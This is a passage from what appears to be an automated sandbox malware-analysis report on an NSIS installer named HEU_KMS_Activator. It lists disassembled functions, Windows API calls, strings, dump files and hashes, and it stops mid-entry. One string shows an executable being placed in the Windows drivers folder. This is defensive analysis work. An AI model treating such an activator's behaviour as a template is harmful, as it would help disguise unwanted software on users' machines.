    • Instruction Fuzzy Hash: 28419072D00208BBDF116F95CD45EEFBBB9EF04718F10403AF505B61E0D67A4A90AB98
    Function 00402C7F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 96memoryfileCOMMON
    Download Yara Rule
    APIs
    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402CD5
    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402CF1
    • GlobalFree.KERNEL32(?), ref: 00402D2A
    • WriteFile.KERNEL32(?,00000000,?,FFFFFD66), ref: 00402D3C
    • GlobalFree.KERNEL32(00000000), ref: 00402D43
    • CloseHandle.KERNEL32(?), ref: 00402D5B
    • DeleteFileA.KERNEL32(?), ref: 00402D82
    Strings
    • created uninstaller: %d, "%s", xrefs: 00402D67
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
    • String ID: created uninstaller: %d, "%s"
    • API String ID: 3294113728-3145124454
    • Opcode ID: 8c4daffa764476c397bc4b19cee64eca0e30d7f61985a16ed9b83fed746a49d6
    • Instruction ID: 2a24e2d0c31af26bfff5c00de31e5aad972f2baae94c93b4e1f7cc7e2bb9d6f1
    • Opcode Fuzzy Hash: 8c4daffa764476c397bc4b19cee64eca0e30d7f61985a16ed9b83fed746a49d6
    • Instruction Fuzzy Hash: E431AC72800028BBDF116FA5CD85DAE7A79EF08324B14423EF520762E0DB7949419BA8
    Function 00403C70 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
    Download Yara Rule
    APIs
    • GetWindowLongA.USER32(?,000000EB), ref: 00403C8A
    • GetSysColor.USER32(00000000), ref: 00403CA6
    • SetTextColor.GDI32(?,00000000), ref: 00403CB2
    • SetBkMode.GDI32(?,?), ref: 00403CBE
    • GetSysColor.USER32(?), ref: 00403CD1
    • SetBkColor.GDI32(?,?), ref: 00403CE1
    • DeleteObject.GDI32(?), ref: 00403CFB
    • CreateBrushIndirect.GDI32(?), ref: 00403D05
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
    • String ID:
    • API String ID: 2320649405-0
    • Opcode ID: 96801a186d4d115bb18627bb134db216860669d5f1e8eb8584970fd652ee8e40
    • Instruction ID: e63eed25e56d782685accc5c91989abb5efb90e386565a98e0fdbb75e57f7206
    • Opcode Fuzzy Hash: 96801a186d4d115bb18627bb134db216860669d5f1e8eb8584970fd652ee8e40
    • Instruction Fuzzy Hash: 1F116671504B046BD7319F64DA08B5BBFF8AF40715F04892DE885F2290D738DA48CB54
    Function 00404D10 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
    Download Yara Rule
    APIs
    • lstrlenA.KERNEL32(0042C9D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403158,00000000,?), ref: 00404D49
    • lstrlenA.KERNEL32(00403158,0042C9D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403158,00000000), ref: 00404D59
    • lstrcatA.KERNEL32(0042C9D8,00403158,00403158,0042C9D8,00000000,00000000,00000000), ref: 00404D6C
    • SetWindowTextA.USER32(0042C9D8,0042C9D8), ref: 00404D7E
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DA4
    • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404DBE
    • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404DCC
      • Part of subcall function 004060EC: GetVersion.KERNEL32(0042C9D8,00000000,?,00404D48,0042C9D8,00000000,00000000,00000000,00000000), ref: 004061A3
      • Part of subcall function 004060EC: lstrcatA.KERNEL32(C:\Windows\SysNative\drivers\DvLayout.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 004062A8
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: MessageSend$lstrcatlstrlen$TextVersionWindow
    • String ID:
    • API String ID: 1396681732-0
    • Opcode ID: 872f70a858d90a245303d1bf7a4ce70b373770582009df378712df21ff0ed755
    • Instruction ID: 6464522b466e749fe96a3871e53ccf2ee938c0e2bdbd9c18f4052ca708d876f8
    • Opcode Fuzzy Hash: 872f70a858d90a245303d1bf7a4ce70b373770582009df378712df21ff0ed755
    • Instruction Fuzzy Hash: F12183B5900118BBDF119FA5DD80ADEBFB9EF45354F14807AFA04B6291C7398940DF68
    Function 00405D7D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51stringfileCOMMON
    Download Yara Rule
    APIs
    • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,00405F2E,00000000), ref: 00405D93
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00444380,40000000,00000004,00000000,?,00405F2E,00000000), ref: 00405DDB
    • lstrcatA.KERNEL32(RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\"),00408CD4,00000000,00000000,?,00405F2E,00000000), ref: 00405DF6
    • lstrlenA.KERNEL32(RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\"),?,00405F2E,00000000), ref: 00405DFD
    • WriteFile.KERNEL32(RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\"),00000000,00405F2E,00000000,?,00405F2E,00000000), ref: 00405E10
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: File$CloseHandlePointerWritelstrcatlstrlen
    • String ID: RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\")
    • API String ID: 4073665932-605988816
    • Opcode ID: d1785a4c38b6b8c8c0830f9846d7b9c8c2475d8ac9ea87be8455ea3d857afc95
    • Instruction ID: bcb33ca6b367f22f7366290136dd08d80bbf25a7af1ec17152d3fcacb0cf22fe
    • Opcode Fuzzy Hash: d1785a4c38b6b8c8c0830f9846d7b9c8c2475d8ac9ea87be8455ea3d857afc95
    • Instruction Fuzzy Hash: 6401A171500B84ABD7206F74EE88957372CEB02775B20833BF5A5B01E0C7345899DE6D
    Function 004030E1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
    Download Yara Rule
    APIs
    • DestroyWindow.USER32(00000000,00000000), ref: 004030F9
    • GetTickCount.KERNEL32 ref: 00403117
    • wsprintfA.USER32 ref: 00403145
      • Part of subcall function 00404D10: lstrlenA.KERNEL32(0042C9D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403158,00000000,?), ref: 00404D49
      • Part of subcall function 00404D10: lstrlenA.KERNEL32(00403158,0042C9D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403158,00000000), ref: 00404D59
      • Part of subcall function 00404D10: lstrcatA.KERNEL32(0042C9D8,00403158,00403158,0042C9D8,00000000,00000000,00000000), ref: 00404D6C
      • Part of subcall function 00404D10: SetWindowTextA.USER32(0042C9D8,0042C9D8), ref: 00404D7E
      • Part of subcall function 00404D10: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DA4
      • Part of subcall function 00404D10: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404DBE
      • Part of subcall function 00404D10: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404DCC
    • CreateDialogParamA.USER32(0000006F,00000000,00403065,00000000), ref: 00403169
    • ShowWindow.USER32(00000000,00000005), ref: 00403177
      • Part of subcall function 00403049: MulDiv.KERNEL32(00000000,00000064,00014079), ref: 0040305E
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
    • String ID: ... %d%%
    • API String ID: 722711167-2449383134
    • Opcode ID: beaf7862a5aed15fe208e26664937f46a96558c09d32a1f4200973cd2793b316
    • Instruction ID: 3a1a2fd8f6bbef1dc8cfae20a61050b5f3bb6b0e4252654ed3a16937c041cbf9
    • Opcode Fuzzy Hash: beaf7862a5aed15fe208e26664937f46a96558c09d32a1f4200973cd2793b316
    • Instruction Fuzzy Hash: A90196B4502128EBC711AF60AD09EAF7E7CAF05B06B14413BF441F91E6DB785A41CB9D
    Function 004045F1 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
    Download Yara Rule
    APIs
    • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040460C
    • GetMessagePos.USER32 ref: 00404614
    • ScreenToClient.USER32(?,?), ref: 0040462E
    • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404640
    • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404666
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: Message$Send$ClientScreen
    • String ID: f
    • API String ID: 41195575-1993550816
    • Opcode ID: 9421c974899feebdbb22c00208a95bc97dbb1d4c410463aa49b9d9c624697508
    • Instruction ID: 968be8fde76d460d0756b568e451f27ccf1c1fe4832d1bd21238342acfddc3c2
    • Opcode Fuzzy Hash: 9421c974899feebdbb22c00208a95bc97dbb1d4c410463aa49b9d9c624697508
    • Instruction Fuzzy Hash: DD018C71900218BADB00DBA4DD85FFFBBBCAF95B11F10012BBA00B61C0D6B899018BA4
    Function 00403065 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
    Download Yara Rule
    APIs
    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00403080
    • wsprintfA.USER32 ref: 004030B4
    • SetWindowTextA.USER32(?,?), ref: 004030C4
    • SetDlgItemTextA.USER32(?,00000406,?), ref: 004030D6
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: Text$ItemTimerWindowwsprintf
    • String ID: unpacking data: %d%%$verifying installer: %d%%
    • API String ID: 1451636040-1158693248
    • Opcode ID: 7502cfacc4d6def781d356a6d2236211fde85066980af0568184a5fe613d57d1
    • Instruction ID: 0b0bd0e1e9b17ea34dbeb0e741569b2ce2a0adba8e267900c0c7db5628e2502f
    • Opcode Fuzzy Hash: 7502cfacc4d6def781d356a6d2236211fde85066980af0568184a5fe613d57d1
    • Instruction Fuzzy Hash: B6F031B150020CABEF209F51DD06BAE3B69EB40306F00C03EFA56B51D5CBB98A559F99
    Function 00405CE3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
    Download Yara Rule
    APIs
    • CharNextA.USER32(?,*?|<>/":,00000000,0047B000,00471000,0047B000,00000000,00403719,0047B000,00000000,004038CD), ref: 00405D3C
    • CharNextA.USER32(?,?,?,00000000), ref: 00405D49
    • CharNextA.USER32(?,0047B000,00471000,0047B000,00000000,00403719,0047B000,00000000,004038CD), ref: 00405D4E
    • CharPrevA.USER32(?,?,00471000,0047B000,00000000,00403719,0047B000,00000000,004038CD), ref: 00405D5E
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: Char$Next$Prev
    • String ID: *?|<>/":
    • API String ID: 589700163-165019052
    • Opcode ID: 3a24fa8c9006dac45d0a5d819a6ac61b56d5d325dd9aa9a76014649340cad8e3
    • Instruction ID: ea709fc9508d644880843fac25a8cdecd3d7eb099d5aa55eb3e96b44218fc408
    • Opcode Fuzzy Hash: 3a24fa8c9006dac45d0a5d819a6ac61b56d5d325dd9aa9a76014649340cad8e3
    • Instruction Fuzzy Hash: A611B261404F9429EB3226295C48F77AFD9CF96760F18807FE5D4722C2DA7C5C828E6D
    Function 00401E90 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00405CC1: lstrcpynA.KERNEL32(?,?,00002000,004037F1,004447E0,NSIS Error), ref: 00405CCE
    • GlobalFree.KERNEL32(00000000), ref: 00402374
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: FreeGloballstrcpyn
    • String ID: C:\Windows\SysNative\drivers\DvLayout.exe$Exch: stack < %d elements$Pop: stack empty
    • API String ID: 1459762280-2750407803
    • Opcode ID: 081fc835baee506785e643e9b7276423b68a0caccc4271b8c47c3d638c73222a
    • Instruction ID: 72d15ca93cccb4bd05205b79b1220d5ac80c59eb60c02eec345e36e7f5f91962
    • Opcode Fuzzy Hash: 081fc835baee506785e643e9b7276423b68a0caccc4271b8c47c3d638c73222a
    • Instruction Fuzzy Hash: BB218072514214EBD720AF59DE81A6F77A8FB08314714043FF552B32D2DB78A850EBAE
    Function 00401488 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
    Download Yara Rule
    APIs
    • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 004014AA
    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 004014E6
    • RegCloseKey.ADVAPI32(?), ref: 004014EF
    • RegCloseKey.ADVAPI32(?), ref: 00401514
    • RegDeleteKeyA.ADVAPI32(?,?), ref: 00401532
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: Close$DeleteEnumOpen
    • String ID:
    • API String ID: 1912718029-0
    • Opcode ID: bedd1dd3781ce937ae06bee25c31ed97682a9129fae70240c9e5053e56a58e9e
    • Instruction ID: 46f9eb3ca8b9ce696386f4474674f490b6bf012e6f701dfe83673b0d13c3eec5
    • Opcode Fuzzy Hash: bedd1dd3781ce937ae06bee25c31ed97682a9129fae70240c9e5053e56a58e9e
    • Instruction Fuzzy Hash: 29113776500009FBDF12AFA0EE859AF3BB9EB84349F10403AFA46B5170D7348E549F68
    Function 004022EB Relevance: 7.6, APIs: 5, Instructions: 57memoryCOMMON
    Download Yara Rule
    APIs
    • GetFileVersionInfoSizeA.VERSION(00000000,?), ref: 004022FB
    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?), ref: 0040231B
    • GetFileVersionInfoA.VERSION(?,?,00000000,00000000), ref: 00402332
    • VerQueryValueA.VERSION(?,00408514,?,?,?,?,00000000,00000000), ref: 0040234B
      • Part of subcall function 00405C1F: wsprintfA.USER32 ref: 00405C2C
    • GlobalFree.KERNEL32(00000000), ref: 00402374
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
    • String ID:
    • API String ID: 3376005127-0
    • Opcode ID: 753314d5b84c36a831c964e5400e8f93d4fbddc243ce663de5bcfa9a04db6bcf
    • Instruction ID: bb743333a9d53ab0ed931c2f46d389a625a834a3ed0778c8e8866ce47ca33a9a
    • Opcode Fuzzy Hash: 753314d5b84c36a831c964e5400e8f93d4fbddc243ce663de5bcfa9a04db6bcf
    • Instruction Fuzzy Hash: 75115E32900118AFDB01AFA5CD45CDE7BB9EF04354B10407AF505B61E1DB788A40EB68
    Function 0040207A Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
    Download Yara Rule
    APIs
    • GetDlgItem.USER32(?), ref: 0040207E
    • GetClientRect.USER32(00000000,?), ref: 0040208B
    • LoadImageA.USER32(?,00000000,?,?,?,00000010), ref: 004020AD
    • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 004020BB
    • DeleteObject.GDI32(00000000), ref: 004020CA
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
    • String ID:
    • API String ID: 1849352358-0
    • Opcode ID: 1097cd964c9183fee2a3b739dadcb9b2a8334bab65d566d47ca60a7f6b6bf62a
    • Instruction ID: 9cbf1ec671b7c9279e85288b73d3c04a1680faf79f29543d5388d0ed6f7c421c
    • Opcode Fuzzy Hash: 1097cd964c9183fee2a3b739dadcb9b2a8334bab65d566d47ca60a7f6b6bf62a
    • Instruction Fuzzy Hash: 3CF0FF72540504AFD701DBA4EE88DBFB7BCFB44341B11443AF601F61A1DA349D419B28
    Function 00401F57 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86windowtimeCOMMON
    Download Yara Rule
    APIs
    • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FBD
    • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401FD5
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: MessageSend$Timeout
    • String ID: !
    • API String ID: 1777923405-2657877971
    • Opcode ID: 711be58800e805ecb6d7b188a1a3b1d34c63471b69e6b862fa27ab3b5b537876
